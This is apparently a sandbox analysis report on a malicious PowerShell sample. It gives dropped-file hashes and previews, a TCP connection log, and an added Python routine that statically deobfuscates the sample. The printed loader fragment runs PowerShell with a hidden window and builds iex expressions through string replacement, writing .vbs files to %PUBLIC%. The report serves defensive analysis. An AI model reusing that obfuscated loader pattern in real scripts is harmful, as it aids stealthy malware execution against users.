                                                                                            SHA-256:A933C727CE6547310A0D7DAD8704B0F16DB90E024218ACE2C39E46B8329409C7
                                                                                            SHA-512:9F150CDA866D433BD595F23124E369D2B797A0CA76A69BA98D30DF462F0A95D13E3B0834887B5CD2A032A55161A0DC8BB30C16AA89663939D6DCF83FAC056D34
                                                                                            Malicious:false
                                                                                            Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                                            Category:dropped
                                                                                            Size (bytes):386528
                                                                                            Entropy (8bit):7.9736851559892425
                                                                                            Encrypted:false
                                                                                            SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                                            MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                                            SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                                            SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                                            SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                                            Malicious:false
                                                                                            Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 634912
                                                                                            Category:dropped
                                                                                            Size (bytes):1407294
                                                                                            Entropy (8bit):7.97605879016224
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:/xbdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJi7oW:Jb3mlind9i4ufFXpAXkrfUs0jWLaGZDI
                                                                                            MD5:1B0B46EF76AC75C2C91FA043AFA150CD
                                                                                            SHA1:A8544CE2FC62DFC7AC592F5F567DBE9A623F8410
                                                                                            SHA-256:12B1773B522EE9AEC4F3AACCB353C370F87E2FDBB7D1F5F966DFE04A15F9A398
                                                                                            SHA-512:B0DFAFEDE6CC1DB69F1755F13B58C42BE6260BB1265CCCEA61CAC24CA43AB595E36A0D673FAA92E5BAE979A60DDAD4B4179AB216B6357F487F0752AA88043FE9
                                                                                            Malicious:false
                                                                                            Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                                            Category:dropped
                                                                                            Size (bytes):758601
                                                                                            Entropy (8bit):7.98639316555857
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                                            MD5:3A49135134665364308390AC398006F1
                                                                                            SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                                            SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                                            SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                                            Malicious:false
                                                                                            Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):6222
                                                                                            Entropy (8bit):3.72359745733705
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:PjcCtP82kvhkvCCtpzqhosxHWhqhosjHW9:PjhPtpzqh6hqhM9
                                                                                            MD5:091F8B49493736BC7EE1F7C3602D9C1A
                                                                                            SHA1:9B3F80B84D072F193DC53515DB33D8EB49195696
                                                                                            SHA-256:B43E32DADF2D08E92BD5F707168BEBF9B8D39B3DF2090A8F169C4A58649EAC7B
                                                                                            SHA-512:15949EB10394CD1CB93D974CBE70C072B7B727686CB9EF06AD17C880DE6BBEB5A1485472C5ADC87C015411121147CCF6DEA83D4183A9D8AD544DCEF2625A0708
                                                                                            Malicious:false
                                                                                            Preview:...................................FL..................F.".. ......Yd...2.q2.R..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......y.Yd......-.R...V.2.R......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)B.YL^..........................d...A.p.p.D.a.t.a...B.V.1......YJ^..Roaming.@......EW)B.YJ^............................5.R.o.a.m.i.n.g.....\.1.....EW.C..MICROS~1..D......EW)B.YG^............................ .M.i.c.r.o.s.o.f.t.....V.1.....EW.D..Windows.@......EW)B.YG^..........................l|..W.i.n.d.o.w.s.......1.....EW+B..STARTM~1..n......EW)B.YG^....................D.....b60.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW(C..Programs..j......EW)B.YG^....................@.......D.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)BEW)B..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW)B.YN^.....0..........
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:PDF document, version 1.7 (zip deflate encoded)
                                                                                            Category:dropped
                                                                                            Size (bytes):871324
                                                                                            Entropy (8bit):7.827941732382635
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:H8QbZ2upCDtuOQKE7nmA3xWYT6LTA2D9dx5:HXpCST7ntB+jDTx5
                                                                                            MD5:CC648C9FBCD03EAC939663F24ED3AB02
                                                                                            SHA1:56F288BABF7DA8A89354140BC5A6C6D09CFEDCAD
                                                                                            SHA-256:F4A5A2657C465B26BB136761227F9D640CD156BABDE0CB78297429020EE1B3D3
                                                                                            SHA-512:5F27E7000A182D1477A7F9DD36AFA668380DE68EF78AC47575ED8414C7D92467B30FDD653DD3A2609CA4250EAAFBD6D56DA5DE375D189222C477346CE8B35AC7
                                                                                            Malicious:false
                                                                                            Preview:%PDF-1.7.%......129 0 obj.<</Linearized 1/L 653248/O 131/E 86423/N 5/T 652770/H [ 497 273]>>.endobj. ..143 0 obj.<</DecodeParms<</Columns 5/Predictor 12>>/Filter/FlateDecode/ID[<E39576C475ABEC43A187B9D780C4757D><641CA28703C4B144886F342023B34532>]/Index[129 38]/Info 128 0 R/Length 89/Prev 652771/Root 130 0 R/Size 167/Type/XRef/W[1 3 1]>>stream..h.bbd`.``b``..".:@$S.X..D....'..n..l..d.....IFwf.x-...$..4f`..,.V..8.....7@.??.@....:.M..endstream.endobj.startxref..0..%%EOF.. ..165 0 obj.<</C 180/E 164/Filter/FlateDecode/I 202/Length 167/O 126/S 74/V 142>>stream..h.b```a``.d`e`H.g.b@.!.f.........uv..g..u..(;.p0..2.h..@....b..H..1/.X..FI.....,]..5.....1*...d....f.i......H.0p.Z..3..E..../.(C!..2p....L...pUF.._.CU...0..."...endstream.endobj.130 0 obj.<</AcroForm 144 0 R/Metadata 48 0 R/Names 145 0 R/Outlines 103 0 R/Pages 127 0 R/StructTreeRoot 117 0 R/Type/Catalog>>.endobj.131 0 obj.<</Contents 132 0 R/CropBox[0 0 595.44 841.68]/Group<</CS/DeviceRGB/S/Transparency/T
                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):55
                                                                                            Entropy (8bit):4.306461250274409
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                            Malicious:false
                                                                                            Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                            File type:ASCII text, with very long lines (841), with no line terminators
                                                                                            Entropy (8bit):5.317412098946815
                                                                                            TrID:
                                                                                              File name:H6epOhxoPY.ps1
                                                                                              File size:841 bytes
                                                                                              MD5:bd912222bc39017ff4cbf8c37d24d889
                                                                                              SHA1:1a4442b9d56c5b3fb06d38009b5f5d01b7a4a809
                                                                                              SHA256:94edb90db4ecf5648a2769b087acdb0323a7521877b6454fc00a6834ce4f76d6
                                                                                              SHA512:c966243576952bfa7a6c6593450f87a784ad80477c3aea173155b69aa0bcdbe53bd2c45e1b36f495fc6bbd85c6c457a37cb5cde78db4345242f38b2a369319bf
                                                                                              SSDEEP:24:XnQhScjWIjLal1WQWAa6KzLeSv7RrZzo2i:ejKIqlRKzKSvl5of
                                                                                              TLSH:E701568557CA09FB0240F5526CC88579323BDB1D34C504A1FEB8022720BCE3C0EC292E
                                                                                              File Content Preview:powershell -win hidden $np3f8b=iex($('[Environment]::GetEbe3s'''.Replace('be3','nvironmentVariable(''public'') + ''\\lvykjh.vb')));$flol=iex($('[Environment]::GetEbe3s'''.Replace('be3','nvironmentVariable(''public'') + ''\\txr.vb')));function getit([strin
                                                                                              Icon Hash:3270d6baae77db44
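The two assignments visible in the File Content Preview above are built by string replacement and handed to iex: a placeholder (`be3`) inside a single-quoted literal is swapped for the rest of the expression, and the `s'` that follows the placeholder completes the `.vbs` extension and the closing quote. The following Python is an editor's added example, not part of the Joe Sandbox report or of the sample, and resolves that pattern statically without executing anything: it decodes PowerShell single-quoted literals (`''` is an escaped quote), applies the ordinal `.Replace()`, and resolves the `[Environment]::GetEnvironmentVariable('public')` concatenation against an assumed default `%PUBLIC%` of `C:\Users\Public`. The input is the head of the preview exactly as the report prints it; the preview is truncated after `function getit([strin`, so nothing past that point is reproduced or guessed.

```python
from __future__ import annotations

import ntpath
import re

# Constructed input: the head of the sample's "File Content Preview" as shown in
# the report. The report truncates the preview, so only this part is used.
SAMPLE_PREVIEW = (
    r"powershell -win hidden $np3f8b=iex($('[Environment]::GetEbe3s'''"
    r".Replace('be3','nvironmentVariable(''public'') + ''\\lvykjh.vb')));"
    r"$flol=iex($('[Environment]::GetEbe3s'''"
    r".Replace('be3','nvironmentVariable(''public'') + ''\\txr.vb')));"
)

# A PowerShell single-quoted literal: any non-quote character or a doubled quote.
PS_LITERAL = r"'((?:[^']|'')*)'"
# '<literal>'.Replace('<needle>', '<replacement>') as this loader uses it.
REPLACE_CALL = re.compile(
    PS_LITERAL + r"\.Replace\(" + PS_LITERAL + r"\s*,\s*" + PS_LITERAL + r"\)"
)
# The expression the Replace() yields, which the sample then passes to iex.
ENV_CONCAT = re.compile(
    r"\[Environment\]::GetEnvironmentVariable\('([^']+)'\)\s*\+\s*" + PS_LITERAL
)

# Assumed environment for path resolution (not taken from the report): a default
# Windows installation places %PUBLIC% here. Extend if other variables appear.
ASSUMED_ENV = {"public": r"C:\Users\Public"}


def ps_unquote(body: str) -> str:
    """Decode the body of a PowerShell single-quoted literal ('' becomes ')."""
    return body.replace("''", "'")


def resolve_replace_calls(script: str) -> list[str]:
    """Statically evaluate every '<s>'.Replace('<a>','<b>') found in the script.

    .NET String.Replace(string, string) is an ordinal, case-sensitive
    replacement, so Python's str.replace reproduces it exactly.
    """
    results = []
    for m in REPLACE_CALL.finditer(script):
        literal, needle, repl = (ps_unquote(g) for g in m.groups())
        results.append(literal.replace(needle, repl))
    return results


def resolve_drop_path(expr: str, env: dict[str, str] = ASSUMED_ENV) -> str | None:
    """Turn "[Environment]::GetEnvironmentVariable('X') + '<tail>'" into a path.

    Windows environment variable names are case-insensitive, hence the lower().
    Returns None for anything that is not this exact shape.
    """
    m = ENV_CONCAT.match(expr)
    if not m:
        return None
    var, tail = m.group(1).lower(), ps_unquote(m.group(2))
    if var not in env:
        return None
    # The sample concatenates a leading '\\'; normpath collapses the doubled separator.
    return ntpath.normpath(env[var] + tail)


def extract_drop_paths(script: str) -> list[str]:
    """Deobfuscate the loader and return every file path it builds, in order."""
    return [p for p in map(resolve_drop_path, resolve_replace_calls(script)) if p]


if __name__ == "__main__":
    for expr in resolve_replace_calls(SAMPLE_PREVIEW):
        print(expr)
    print(extract_drop_paths(SAMPLE_PREVIEW))
```

Running the block prints the two reconstructed expressions and the resolved drop paths under the assumed `%PUBLIC%`, which is what you would pivot on in file-creation telemetry rather than on the randomised variable names. Because nothing is executed, the same routine is safe to run over a batch of similar loaders on an analyst workstation.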
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Dec 19, 2024 12:50:41.382834911 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:41.382965088 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:41.383105040 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:41.396394968 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:41.396461964 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:42.656326056 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:42.656485081 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:42.660391092 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:42.660404921 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:42.660913944 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:42.672539949 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:42.719347954 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.098707914 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.148742914 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:43.218564987 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.218586922 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.218610048 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.218619108 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.218637943 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:43.218671083 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.218684912 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.218696117 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:43.218738079 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:43.335345984 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.335386038 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.335520029 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:43.335552931 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.335588932 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:43.379082918 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.379116058 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.379264116 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:43.379297018 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.379333973 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:43.503927946 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.503964901 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.504076958 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:43.504110098 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.504148960 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:43.538455009 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.538496017 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.538566113 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:43.538608074 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.538633108 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:43.538646936 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:43.566611052 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.566647053 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.566720963 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:43.566751957 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.566787004 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:43.566800117 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:43.681230068 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.681277990 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.681312084 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:43.681340933 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.681355953 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:43.681372881 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:43.704575062 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.704616070 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.704667091 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:43.704689980 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.704766035 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:43.705236912 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:43.722701073 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.722738981 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.722812891 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:43.722835064 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.722851992 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:43.722871065 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:43.742882013 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.742918968 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.742964983 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:43.742980003 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.743036032 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:43.763873100 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.763911963 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.763952971 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:43.763962984 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.764013052 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:43.866810083 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.866889000 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.866921902 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:43.866941929 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.866983891 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:43.882556915 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.882613897 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.882651091 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:43.882672071 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.882714987 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:43.895291090 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.895378113 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.895406961 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:43.895417929 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.895466089 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:43.908806086 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.908869982 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.908902884 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:43.908915043 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.908963919 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:43.921940088 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.921976089 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.922025919 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:43.922036886 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.922096968 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:43.934437990 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.934477091 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.934557915 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:43.934571028 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.934617043 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:43.947763920 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.947853088 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.947885990 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:43.947897911 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.947947025 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:43.959456921 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.959498882 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.959541082 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:43.959552050 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:43.959604025 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:44.060949087 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:44.060991049 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:44.061037064 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:44.061053038 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:44.061096907 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:44.071007013 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:44.071043015 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:44.071094990 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:44.071111917 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:44.071141958 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:44.071162939 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:44.079289913 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:44.079334974 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:44.079385996 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:44.079399109 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:44.079446077 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:44.079463959 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:44.088385105 CET  443          49704      107.161.23.150   192.168.2.8
